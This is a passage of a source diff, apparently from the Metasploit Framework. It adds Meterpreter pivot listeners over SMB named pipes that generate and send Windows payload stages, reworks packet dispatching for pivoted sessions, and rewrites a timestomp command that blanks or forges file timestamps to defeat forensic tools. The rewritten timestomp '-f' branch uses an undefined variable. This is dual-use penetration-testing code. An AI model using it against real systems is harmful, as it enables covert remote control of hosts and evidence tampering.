-790,11 +781,11 @@ private opts[:lhost] = nil end - transport = VALID_TRANSPORTS[opts[:transport]] + transport = opts[:transport].downcase request = Packet.create_request(method) - scheme = opts[:transport].split('_')[1] + scheme = transport.split('_')[1] url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}" if opts[:luri] && opts[:luri].length > 0 @@ -824,7 +815,7 @@ private end # do more magic work for http(s) payloads - unless opts[:transport].ends_with?('tcp') + unless transport.ends_with?('tcp') if opts[:uri] url << '/' unless opts[:uri].start_with?('/') url << opts[:uri] @@ -838,7 +829,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert] + if transport == 'reverse_https' && opts[:cert] hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -862,24 +853,7 @@ private request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) request.add_tlv(TLV_TYPE_TRANS_URL, url) - return request - end - - - # - # Create a full migration payload specific to the target process. - # - def generate_migrate_payload(target_process) - case client.platform - when 'windows' - blob = generate_migrate_windows_payload(target_process) - when 'linux' - blob = generate_migrate_linux_payload - else - raise RuntimeError, "Unsupported platform '#{client.platform}'" - end - - blob + request end # @@ -905,34 +879,18 @@ private end # - # Create a full Linux-specific migration payload specific to the target process. + # Create a full migration payload specific to the target process. # - def generate_migrate_linux_payload - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - # - # Determine the elf entry poitn for the given payload. - # - def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep - end - - # - # Get the tmp folder for the session. - # - def tmp_folder - tmp = client.sys.config.getenv('TMPDIR') - - if tmp.to_s.strip.empty? - tmp = '/tmp' + def generate_migrate_payload(target_process) + case client.platform + when 'windows' + blob = generate_migrate_windows_payload(target_process) + else + raise RuntimeError, "Unsupported platform '#{client.platform}'" end - tmp + blob end - end end; end; end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 4fb1152109..f3847a9957 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -80,7 +80,6 @@ class Kiwi < Extension elsif output =~ /^ERROR.*SamLookupNamesInDomain/m result[:error] = 'Invalid user.' else - STDERR.puts(output) result[:error] = 'Unknown error.' end else diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index 5160db7842..5a00e8a111 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -17,7 +17,7 @@ TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 - + ## # # Fs diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 15b7ca1e2a..8c81169242 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -113,6 +113,15 @@ TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551 TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552 TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553 +# +# Pivots +# +TLV_TYPE_PIVOT_ID = TLV_META_TYPE_RAW | 650 +TLV_TYPE_PIVOT_STAGE_DATA = TLV_META_TYPE_RAW | 651 +TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_META_TYPE_UINT | 652 +TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_META_TYPE_STRING | 653 + + # # Core flags # @@ -120,6 +129,12 @@ LOAD_LIBRARY_FLAG_ON_DISK = (1 << 0) LOAD_LIBRARY_FLAG_EXTENSION = (1 << 1) LOAD_LIBRARY_FLAG_LOCAL = (1 << 2) +# +# Sane defaults +# +GUID_SIZE = 16 +NULL_GUID = "\x00" * GUID_SIZE + ### # # Base TLV (Type-Length-Value) class @@ -227,6 +242,11 @@ class Tlv when TLV_TYPE_SYM_KEY; "SYM-KEY" when TLV_TYPE_ENC_SYM_KEY; "ENC-SYM-KEY" + when TLV_TYPE_PIVOT_ID; "PIVOT-ID" + when TLV_TYPE_PIVOT_STAGE_DATA; "PIVOT-STAGE-DATA" + when TLV_TYPE_PIVOT_STAGE_DATA_SIZE; "PIVOT-STAGE-DATA-SIZE" + when TLV_TYPE_PIVOT_NAMED_PIPE_NAME; "PIVOT-NAMED-PIPE-NAME" + #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface' #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address' #when Extensions::Stdapi::TLV_TYPE_NETMASK; 'netmask' @@ -624,6 +644,8 @@ class Packet < GroupTlv attr_accessor :created_at attr_accessor :raw attr_accessor :session_guid + attr_accessor :encrypt_flags + attr_accessor :length ## # @@ -654,11 +676,10 @@ class Packet < GroupTlv ### XOR_KEY_SIZE = 4 - SESSION_GUID_SIZE = 16 ENCRYPTED_FLAGS_SIZE = 4 PACKET_LENGTH_SIZE = 4 PACKET_TYPE_SIZE = 4 - PACKET_HEADER_SIZE = XOR_KEY_SIZE + SESSION_GUID_SIZE + ENCRYPTED_FLAGS_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE + PACKET_HEADER_SIZE = XOR_KEY_SIZE + GUID_SIZE + ENCRYPTED_FLAGS_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE AES_IV_SIZE = 16 @@ -786,7 +807,7 @@ class Packet < GroupTlv def to_r(session_guid = nil, key = nil) xor_key = (rand(254) + 1).chr + (rand(254) + 1).chr + (rand(254) + 1).chr + (rand(254) + 1).chr - raw = [(session_guid || '00' * SESSION_GUID_SIZE).gsub(/-/, '')].pack('H*') + raw = (session_guid || NULL_GUID).dup tlv_data = GroupTlv.instance_method(:to_r).bind(self).call if key && key[:key] && key[:type] == ENC_FLAG_AES256 @@ -817,6 +838,12 @@ class Packet < GroupTlv end end + def parse_header! + xor_key = self.raw.unpack('a4')[0] + data = xor_bytes(xor_key, self.raw[0..PACKET_HEADER_SIZE]) + _, self.session_guid, self.encrypt_flags, self.length, self.type = data.unpack('a4a16NNN') + end + # # Override the function that reads from a raw byte stream so # that the XORing of data is included in the process prior to @@ -824,11 +851,11 @@ class Packet < GroupTlv # the TLV values. # def from_r(key=nil) + self.parse_header! xor_key = self.raw.unpack('a4')[0] - data = xor_bytes(xor_key, self.raw) - _, self.session_guid, encrypt_flags, length, type = data.unpack('a4a16NNN') - raw = decrypt_packet(key, encrypt_flags, data[PACKET_HEADER_SIZE..-1]) - super([length, type, raw].pack('NNA*')) + data = xor_bytes(xor_key, self.raw[PACKET_HEADER_SIZE..-1]) + raw = decrypt_packet(key, self.encrypt_flags, data) + super([self.length, self.type, raw].pack('NNA*')) end # diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index 6bea6f8683..3699eaea1f 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -137,7 +137,7 @@ module PacketDispatcher if req.body and req.body.length > 0 packet = Packet.new(0) packet.add_raw(req.body) - packet.from_r(self.tlv_enc_key) + packet.parse_header! dispatch_inbound_packet(packet) end cli.send_response(resp) @@ -157,13 +157,28 @@ module PacketDispatcher # # Sends a packet without waiting for a response. # - def send_packet(packet, completion_routine = nil, completion_param = nil) - if (completion_routine) - add_response_waiter(packet, completion_routine, completion_param) + def send_packet(packet, opts={}) + if self.pivot_session + opts[:session_guid] = self.session_guid + opts[:tlv_enc_key] = self.tlv_enc_key + return self.pivot_session.send_packet(packet, opts) + end + + if opts[:completion_routine] + add_response_waiter(packet, opts[:completion_routine], opts[:completion_param]) + end + + session_guid = self.session_guid + tlv_enc_key = self.tlv_enc_key + + # if a session guid is provided, use all the details provided + if opts[:session_guid] + session_guid = opts[:session_guid] + tlv_enc_key = opts[:tlv_enc_key] end bytes = 0 - raw = packet.to_r(self.session_guid, self.tlv_enc_key) + raw = packet.to_r(session_guid, tlv_enc_key) err = nil # Short-circuit send when using a passive dispatcher @@ -289,6 +304,24 @@ module PacketDispatcher # Reception # ## + + def pivot_keepalive_start + return unless self.send_keepalives + self.receiver_thread = Rex::ThreadFactory.spawn("PivotKeepalive", false) do + while self.alive + begin + Rex::sleep(PING_TIME) + keepalive + rescue ::Exception => e + dlog("Exception caught in pivot keepalive: #{e.class}: #{e}", 'meterpreter', LEV_1) + dlog("Call stack: #{e.backtrace.join("\n")}", 'meterpreter', LEV_2) + self.alive = false + break + end + end + end + end + # # Monitors the PacketDispatcher's sock for data in its own # thread context and parsers all inbound packets. @@ -298,6 +331,9 @@ module PacketDispatcher # Skip if we are using a passive dispatcher return if self.passive_service + # redirect to pivot keepalive if we're a pivot session + return pivot_keepalive_start if self.pivot_session + self.comm_mutex = ::Mutex.new self.waiters = [] @@ -370,7 +406,7 @@ module PacketDispatcher backlog.each do |pkt| begin - if ! dispatch_inbound_packet(pkt) + unless dispatch_inbound_packet(pkt) # Keep Packets in the receive queue until a handler is registered # for them. Packets will live in the receive queue for up to # PACKET_TIMEOUT seconds, after which they will be dropped. @@ -427,10 +463,9 @@ module PacketDispatcher def receive_packet packet = parser.recv(self.sock) if packet - packet.from_r(self.tlv_enc_key) - if self.session_guid == '00000000-0000-0000-0000-000000000000' - parts = packet.session_guid.unpack('H*')[0] - self.session_guid = [parts[0, 8], parts[8, 4], parts[12, 4], parts[16, 4], parts[20, 12]].join('-') + packet.parse_header! + if self.session_guid == NULL_GUID + self.session_guid = packet.session_guid.dup end end packet @@ -440,12 +475,12 @@ module PacketDispatcher # Stop the monitor # def monitor_stop - if(self.receiver_thread) + if self.receiver_thread self.receiver_thread.kill self.receiver_thread = nil end - if(self.dispatcher_thread) + if self.dispatcher_thread self.dispatcher_thread.kill self.dispatcher_thread = nil end @@ -461,6 +496,10 @@ module PacketDispatcher # Adds a waiter association with the supplied request packet. # def add_response_waiter(request, completion_routine = nil, completion_param = nil) + if self.pivot_session + return self.pivot_session.add_response_waiter(request, completion_routine, completion_param) + end + waiter = PacketResponseWaiter.new(request.rid, completion_routine, completion_param) self.waiters << waiter @@ -473,6 +512,10 @@ module PacketDispatcher # if anyone. # def notify_response_waiter(response) + if self.pivot_session + return self.pivot_session.notify_response_waiter(response) + end + handled = false self.waiters.each() { |waiter| if (waiter.waiting_for?(response)) @@ -489,7 +532,11 @@ module PacketDispatcher # Removes a waiter from the list of waiters. # def remove_response_waiter(waiter) - self.waiters.delete(waiter) + if self.pivot_session + self.pivot_session.remove_response_waiter(waiter) + else + self.waiters.delete(waiter) + end end ## @@ -514,15 +561,21 @@ module PacketDispatcher def dispatch_inbound_packet(packet) handled = false + pivot_session = self.find_pivot_session(packet.session_guid) + + tlv_enc_key = self.tlv_enc_key + tlv_enc_key = pivot_session.pivoted_session.tlv_enc_key if pivot_session + + packet.from_r(tlv_enc_key) + # Update our last reply time self.last_checkin = Time.now + pivot_session.pivoted_session.last_checkin = self.last_checkin if pivot_session # If the packet is a response, try to notify any potential # waiters - if packet.response? - if (notify_response_waiter(packet)) - return true - end + if packet.response? && notify_response_waiter(packet) + return true end # Enumerate all of the inbound packet handlers until one handles diff --git a/lib/rex/post/meterpreter/pivot.rb b/lib/rex/post/meterpreter/pivot.rb new file mode 100644 index 0000000000..82814c8ce5 --- /dev/null +++ b/lib/rex/post/meterpreter/pivot.rb @@ -0,0 +1,163 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/inbound_packet_handler' +require 'securerandom' + +module Rex +module Post +module Meterpreter + +class PivotListener + attr_accessor :id + + attr_accessor :session_class + + attr_accessor :url + + attr_accessor :stage + + def initialize(session_class, url, stage) + self.id = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') + self.session_class = session_class + self.url = url + self.stage = stage + end + + def to_row + [self.id.unpack('H*')[0], url, stage] + end +end + +class Pivot + + # + # The associated meterpreter client instance + # + attr_accessor :client + + attr_accessor :pivoted_session + + # Class modifications to support global pivot message + # dispatching without having to register a per-instance handler + class << self + include Rex::Post::Meterpreter::InboundPacketHandler + + # Class request handler for all channels that dispatches requests + # to the appropriate class instance's DIO handler + def request_handler(client, packet) + if packet.method == 'core_pivot_session_new' + session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) + listener_id = packet.get_tlv_value(TLV_TYPE_PIVOT_ID) + client.add_pivot_session(Pivot.new(client, session_guid, listener_id)) + elsif packet.method == 'core_pivot_session_died' + session_guid = packet.get_tlv_value(TLV_TYPE_SESSION_GUID) + pivot = client.find_pivot_session(session_guid) + if pivot + pivot.pivoted_session.kill('Died') + client.remove_pivot_session(session_guid) + end + end + true + end + end + + def Pivot.get_listeners(client) + client.pivot_listeners + end + + def Pivot.remove_listener(client, listener_id) + if client.find_pivot_listener(listener_id) + request = Packet.create_request('core_pivot_remove') + request.add_tlv(TLV_TYPE_PIVOT_ID, listener_id) + client.send_request(request) + client.remove_pivot_listener(listener_id) + end + end + + def Pivot.create_named_pipe_listener(client, opts={}) + request = Packet.create_request('core_pivot_add') + request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) + + # TODO: use the framework to generate the whole lot, including a session type + c = Class.new(::Msf::Payload) + c.include(::Msf::Payload::Stager) + c.include(::Msf::Payload::TransportConfig) + + # TODO: add more platforms + case opts[:platform] + when 'windows' + # Include the appropriate reflective dll injection module for the target process architecture... + if opts[:arch] == ARCH_X86 + c.include(::Msf::Payload::Windows::MeterpreterLoader) + elsif opts[:arch] == ARCH_X64 + c.include(::Msf::Payload::Windows::MeterpreterLoader_x64) + else + STDERR.puts("Not including a loader for '#{opts[:arch]}'\n") + end + end + + stage_opts = { + arch: opts[:arch], + force_write_handle: true, + null_session_guid: true, + datastore: { + exit_func: opts[:exit_func] || 'process', + expiration: client.expiration, + comm_timeout: client.comm_timeout, + retry_total: client.retry_total, + retry_wait: client.retry_wait, + 'PIPEHOST' => opts[:pipe_host], + 'PIPENAME' => opts[:pipe_name] + } + } + + # Create the migrate stager + stager = c.new() + + stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)] + stage = stager.stage_payload(stage_opts) + + url = "pipe://#{opts[:pipe_host]}/#{opts[:pipe_name]}" + stage_config = "#{opts[:arch]}/#{opts[:platform]}" + pivot_listener = PivotListener.new(::Msf::Sessions::Meterpreter_x86_Win, url, stage_config) + + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage) + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length) + request.add_tlv(TLV_TYPE_PIVOT_ID, pivot_listener.id) + + client.send_request(request) + + client.add_pivot_listener(pivot_listener) + + pivot_listener + end + + def initialize(client, session_guid, listener_id) + self.client = client + + opts = { + pivot_session: client, + session_guid: session_guid + } + + listener = client.find_pivot_listener(listener_id) + self.pivoted_session = listener.session_class.new(nil, opts) + + self.pivoted_session.framework = self.client.framework + self.pivoted_session.bootstrap({'AutoVerifySessionTimeout' => 30}) + self.client.framework.sessions.register(self.pivoted_session) + end + +protected + + # + # Cleans up any lingering resources + # + def cleanup + end + +end + +end; end; end + + diff --git a/lib/rex/post/meterpreter/pivot_container.rb b/lib/rex/post/meterpreter/pivot_container.rb new file mode 100644 index 0000000000..e87e5807e6 --- /dev/null +++ b/lib/rex/post/meterpreter/pivot_container.rb @@ -0,0 +1,72 @@ +# -*- coding: binary -*- + +module Rex +module Post +module Meterpreter + +### +# +# This interface is meant to be included by things that are meant to contain +# zero or more pivot instances in the form of a hash. +# +### +module PivotContainer + + # + # Initializes the pivot association hash + # + def initialize_pivots + self.pivot_sessions = {} + self.pivot_listeners = {} + end + + # + # Adds a pivot to the container that is indexed by the pivoted + # session guid. + # + def add_pivot_session(pivot) + self.pivot_sessions[pivot.pivoted_session.session_guid] = pivot + end + + def add_pivot_listener(listener) + self.pivot_listeners[listener.id] = listener + end + + # + # Looks up a pivot instance based on its pivoted session guid. + # + def find_pivot_session(pivot_session_guid) + return self.pivot_sessions[pivot_session_guid] + end + + def find_pivot_listener(listener_id) + return self.pivot_listeners[listener_id] + end + + # + # Removes a pivot based on its pivoted session guid. + # + def remove_pivot_session(pivot_session_guid) + return self.pivot_sessions.delete(pivot_session_guid) + end + + def remove_pivot_listener(listener_id) + return self.pivot_listeners.delete(listener_id) + end + + # + # The hash of pivot sessions. + # + attr_reader :pivot_sessions + + attr_reader :pivot_listeners + +protected + + attr_writer :pivot_sessions # :nodoc: + + attr_writer :pivot_listeners # :nodoc: + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 420430f7fd..1dc678cc67 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -83,6 +83,8 @@ class Console::CommandDispatcher::Core if client.passive_service && client.sock.type? == 'tcp-ssl' c['ssl_verify'] = 'Modify the SSL certificate verification setting' end + + c['pivot'] = 'Manage pivot listeners' end if client.platform == 'windows' || client.platform == 'linux' @@ -119,6 +121,156 @@ class Console::CommandDispatcher::Core 'Core' end + @@pivot_opts = Rex::Parser::Arguments.new( + '-t' => [true, 'Pivot listener type'], + '-i' => [true, 'Identifier of the pivot to remove'], + '-l' => [true, 'Host address to bind to (if applicable)'], + '-n' => [true, 'Name of the listener entity (if applicable)'], + '-a' => [true, 'Architecture of the stage to generate'], + '-p' => [true, 'Platform of the stage to generate'], + '-h' => [false, 'View help'] + ) + + @@pivot_supported_archs = [ARCH_X64, ARCH_X86] + @@pivot_supported_platforms = ['windows'] + + def cmd_pivot_help + print_line('Usage: pivot [options]') + print_line + print_line('Manage pivot listeners on the target.') + print_line + print_line(@@pivot_opts.usage) + print_line + print_line('Supported pivot types:') + print_line(' - pipe (using named pipes over SMB)') + print_line('Supported arhiectures:') + @@pivot_supported_archs.each do |a| + print_line(' - ' + a) + end + print_line('Supported platforms:') + print_line(' - windows') + print_line + print_line("eg. pivot add -t pipe -l 192.168.0.1 -n msf-pipe -a #{@@pivot_supported_archs.first} -p windows") + print_line(" pivot list") + print_line(" pivot remove -i 1") + print_line + end + + def cmd_pivot(*args) + if args.length == 0 || args.include?('-h') + cmd_pivot_help + return true + end + + opts = {} + @@pivot_opts.parse(args) { |opt, idx, val| + case opt + when '-t' + opts[:type] = val + when '-i' + opts[:guid] = val + when '-l' + opts[:lhost] = val + when '-n' + opts[:name] = val + when '-a' + opts[:arch] = val + when '-p' + opts[:platform] = val + end + } + + # first parameter is the command + case args[0] + when 'remove', 'del', 'delete', 'rm' + unless opts[:guid] + print_error('Pivot listener ID must be specified (-i)') + return false + end + + unless opts[:guid] =~ /^[0-9a-f]{32}/i && opts[:guid].length == 32 + print_error("Invalid pivot listener ID: #{opts[:guid]}") + return false + end + + listener_id = [opts[:guid]].pack('H*') + unless client.find_pivot_listener(listener_id) + print_error("Unknown pivot listener ID: #{opts[:guid]}") + return false + end + + Pivot.remove_listener(client, listener_id) + print_good("Successfully removed pivot: #{opts[:guid]}") + when 'list', 'show', 'print' + if client.pivot_listeners.length > 0 + tbl = Rex::Text::Table.new( + 'Header' => 'Currently active pivot listeners', + 'Indent' => 4, + 'Columns' => ['Id', 'URL', 'Stage']) + + client.pivot_listeners.each do |k, v| + tbl << v.to_row + end + print_line + print_line(tbl.to_s) + else + print_status('There are no active pivot listeners') + end + when 'add' + unless opts[:type] + print_error('Pivot type must be specified (-t)') + return false + end + + unless opts[:arch] + print_error('Architecture must be specified (-a)') + return false + end + unless @@pivot_supported_archs.include?(opts[:arch]) + print_error("Unknown or unsupported architecture: #{opts[:arch]}") + return false + end + + unless opts[:platform] + print_error('Platform must be specified (-p)') + return false + end + unless @@pivot_supported_platforms.include?(opts[:platform]) + print_error("Unknown or unsupported platform: #{opts[:platform]}") + return false + end + + # currently only one pivot type supported, more to come we hope + case opts[:type] + when 'pipe' + pivot_add_named_pipe(opts) + else + print_error("Unknown pivot type: #{opts[:type]}") + return false + end + else + print_error("Unknown command: #{args[0]}") + end + end + + def pivot_add_named_pipe(opts) + unless opts[:lhost] + print_error('Pipe host must be specified (-l)') + return false + end + + unless opts[:name] + print_error('Pipe name must be specified (-n)') + return false + end + + # reconfigure the opts so that they can be passed to the setup function + opts[:pipe_host] = opts[:lhost] + opts[:pipe_name] = opts[:name] + Pivot.create_named_pipe_listener(client, opts) + print_good("Successfully created #{opts[:type]} pivot.") + end + def cmd_sessions_help print_line('Usage: sessions ') print_line @@ -605,7 +757,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb index 8d7ba38af4..a02d046e70 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb @@ -2,141 +2,162 @@ require 'rex/post/meterpreter' module Rex -module Post -module Meterpreter -module Ui + module Post + module Meterpreter + module Ui + ### + # + # This class provides commands that interact with the timestomp feature set of + # the privilege escalation extension. + # + ### + class Console::CommandDispatcher::Priv::Timestomp + Klass = Console::CommandDispatcher::Priv::Timestomp -### -# -# This class provides commands that interact with the timestomp feature set of -# the privilege escalation extension. -# -### -class Console::CommandDispatcher::Priv::Timestomp + include Console::CommandDispatcher - Klass = Console::CommandDispatcher::Priv::Timestomp + @@timestomp_opts = Rex::Parser::Arguments.new( + "-m" => [ true, "Set the \"last written\" time of the file" ], + "-a" => [ true, "Set the \"last accessed\" time of the file" ], + "-c" => [ true, "Set the \"creation\" time of the file" ], + "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], + "-z" => [ true, "Set all four attributes (MACE) of the file" ], + "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], + "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], + "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], + "-v" => [ false, "Display the UTC MACE values of the file" ], + "-h" => [ false, "Help banner" ] + ) - include Console::CommandDispatcher + # + # List of supported commands. + # + def commands + { + "timestomp" => "Manipulate file MACE attributes" + } + end - @@timestomp_opts = Rex::Parser::Arguments.new( - "-m" => [ true, "Set the \"last written\" time of the file" ], - "-a" => [ true, "Set the \"last accessed\" time of the file" ], - "-c" => [ true, "Set the \"creation\" time of the file" ], - "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], - "-z" => [ true, "Set all four attributes (MACE) of the file" ], - "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], - "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], - "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], - "-v" => [ false, "Display the UTC MACE values of the file" ], - "-h" => [ false, "Help banner" ]) + # + # Name for this dispatcher. + # + def name + "Priv: Timestomp" + end - # - # List of supported commands. - # - def commands - { - "timestomp" => "Manipulate file MACE attributes" - } - end + # + # This command provides the same level of features that vinnie's command + # line timestomp interface provides with a similar argument set. + # + def cmd_timestomp(*args) + paths = [] - # - # Name for this dispatcher. - # - def name - "Priv: Timestomp" - end + modified = nil + accessed = nil + creation = nil + emodified = nil - # - # This command provides the same level of features that vinnie's command - # line timestomp interface provides with a similar argument set. - # - def cmd_timestomp(*args) - if (args.length < 2) - print_line("\nUsage: timestomp OPTIONS file_path\n" + - @@timestomp_opts.usage) - return - end + blank_file_mace = false + blank_directory_mace = false + get_file_mace = false + help = false - file_path = nil - args.each { |a| file_path = a unless a[0] == "-" } + @@timestomp_opts.parse(args) do |opt, _idx, val| + case opt + when "-m" + modified = str_to_time(val) + when "-a" + accessed = str_to_time(val) + when "-c" + creation = str_to_time(val) + when "-e" + emodified = str_to_time(val) + when "-z" + modified = str_to_time(val) + accessed = str_to_time(val) + creation = str_to_time(val) + emodified = str_to_time(val) + when "-f" + print_status("Setting MACE attributes on #{path} from #{val}") + hash = client.priv.fs.get_file_mace(path) + if hash + modified = str_to_time(hash['Modified']) + accessed = str_to_time(hash['Accessed']) + creation = str_to_time(hash['Created']) + emodified = str_to_time(hash['Entry Modified']) + end + when "-b" + blank_file_mace = true + when "-r" + blank_directory_mace = true + when "-v" + get_file_mace = true + when "-h" + help = true + when nil + paths << val + end + end - if file_path.nil? - print_line("\nNo file_path specified.") - return - end + if paths.empty? + print_line("\nNo paths specified.") + return nil + end - args.delete(file_path) + if !(modified || accessed || creation || emodified || + blank_file_mace || blank_directory_mace || get_file_mace) || help + print_line("\nUsage: timestomp OPTIONS\n" + + @@timestomp_opts.usage) + return nil + end - modified = nil - accessed = nil - creation = nil - emodified = nil + paths.uniq.each do |path| + # If any one of the four times were specified, change them. + if modified || accessed || creation || emodified + print_status("Setting specific MACE attributes on #{path}") + client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified) + end - @@timestomp_opts.parse(args) { |opt, idx, val| - case opt - when "-m" - modified = str_to_time(val) - when "-a" - accessed = str_to_time(val) - when "-c" - creation = str_to_time(val) - when "-e" - emodified = str_to_time(val) - when "-z" - print_line("#{val}") - modified = str_to_time(val) - accessed = str_to_time(val) - creation = str_to_time(val) - emodified = str_to_time(val) - when "-f" - print_status("Setting MACE attributes on #{file_path} from #{val}") - client.priv.fs.set_file_mace_from_file(file_path, val) - when "-b" - print_status("Blanking file MACE attributes on #{file_path}") - client.priv.fs.blank_file_mace(file_path) - when "-r" - print_status("Blanking directory MACE attributes on #{file_path}") - client.priv.fs.blank_directory_mace(file_path) - when "-v" - hash = client.priv.fs.get_file_mace(file_path) + if blank_file_mace + print_status("Blanking file MACE attributes on #{path}") + client.priv.fs.blank_file_mace(path) + end - print_line("Modified : #{hash['Modified']}") - print_line("Accessed : #{hash['Accessed']}") - print_line("Created : #{hash['Created']}") - print_line("Entry Modified: #{hash['Entry Modified']}") - when "-h" - print_line("\nUsage: timestomp file_path OPTIONS\n" + - @@timestomp_opts.usage) - return + if blank_directory_mace + print_status("Blanking directory MACE attributes on #{path}") + client.priv.fs.blank_directory_mace(path) + end + + if get_file_mace + hash = client.priv.fs.get_file_mace(path) + print_status("Showing MACE attributes for #{path}") + print_line("Modified : #{hash['Modified']}") + print_line("Accessed : #{hash['Accessed']}") + print_line("Created : #{hash['Created']}") + print_line("Entry Modified: #{hash['Entry Modified']}") + end + end + end + + protected + + # + # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS + # + def str_to_time(str) # :nodoc: + unless str.nil? + _r, mon, day, year, hour, min, sec = + str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a + end + + if str.nil? || mon.nil? + raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" + end + + Time.mktime(year, mon, day, hour, min, sec, 0) + end + end end - } - - # If any one of the four times were specified, change them. - if (modified or accessed or creation or emodified) - print_status("Setting specific MACE attributes on #{file_path}") - client.priv.fs.set_file_mace(file_path, modified, accessed, - creation, emodified) end end - -protected - - # - # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS - # - def str_to_time(str) # :nodoc: - r, mon, day, year, hour, min, sec = str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a - - if (mon == nil) - raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" - end - - Time.mktime(year, mon, day, hour, min, sec, 0) - end - -end - -end -end -end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 4e9e0079b2..5e7e987eda 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -894,13 +894,21 @@ class Console::CommandDispatcher::Stdapi::Sys if args.include? "-h" cmd_getprivs_help end - print_line("=" * 60) - print_line("Enabled Process Privileges") - print_line("=" * 60) + + table = Rex::Text::Table.new( + 'Header' => 'Enabled Process Privileges', + 'Indent' => 0, + 'SortIndex' => 1, + 'Columns' => ['Name'] + ) + + privs = client.sys.config.getprivs client.sys.config.getprivs.each do |priv| - print_line(" #{priv}") + table << [priv] end - print_line("") + + print_line + print_line(table.to_s) end # diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cb1c245860..b3c110bb1e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -191,9 +191,9 @@ class Client # Closes the connection to the 